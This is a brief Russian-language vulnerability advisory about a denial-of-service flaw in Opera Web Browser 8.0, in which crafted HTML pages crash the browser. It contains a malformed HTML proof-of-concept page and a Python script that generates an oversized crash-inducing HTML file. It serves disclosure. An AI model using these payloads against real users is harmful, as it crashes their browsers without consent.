Программа: Opera Web Browser 8.0 2

Уязвимость позволяет удаленному злоумышленнику вызвать отказ в обслуживании. Уязвимость существует из-за ошибки в обработке некоторых HTML страниц. Атакующий может заставить пользователя посетить злонамеренный сайт, содержащий специально составленные HTML страницы, что приведет краху Web браузера.

Примеры:

Злонамеренный HTML файл:

<html><head></head><body><bdo>A<bgsound style="margin:-99;">A<hr>A<hr></body></html>

Код, написанный на Python для создания злонамеренного HTML файла:

html = open("opera.html", "w")
html.write("<html style=\"content: url(0);\">\n")
html.write("<head></head>\n")
buff1 = 'A'*32499
html.write("<bodyA>\n"+buff1+"\n")
buff2 = 'B'*153
html.write("<u "+buff2+">\n")
html.write("</body></html>")
html.close()



Оставить мнение